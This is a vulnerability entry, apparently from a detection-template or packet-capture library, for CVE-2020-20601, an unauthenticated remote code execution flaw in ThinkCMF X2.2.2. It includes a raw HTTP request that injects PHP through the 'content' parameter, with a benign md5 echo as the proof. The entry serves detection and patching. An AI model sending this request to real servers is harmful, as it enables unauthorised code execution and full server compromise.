| Title | ThinkCMF X2.2.2 - Remote Code Execution |
|---|---|
| Author | pikpikcu |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary PHP code on ThinkCMF servers, leading to complete server compromise and access to all website data. |
| Remediation | Upgrade to ThinkCMF version X2.2.3 or later. |
| CVSS Score | 9.8 |
| EPSS Score | 0.48111 |
| CVE ID | CVE-2020-20601 |
| CWE ID | CWE-94 |
| Tags | cve cve2020 thinkcmf rce vuln vkev |
ThinkCMF X2.2.2 and below contain a remote code execution caused by processing crafted packets, letting attackers execute arbitrary code remotely, exploit requires sending malicious packets.
GET /index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF'); HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-20601.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-20601.pcap
N/AN/A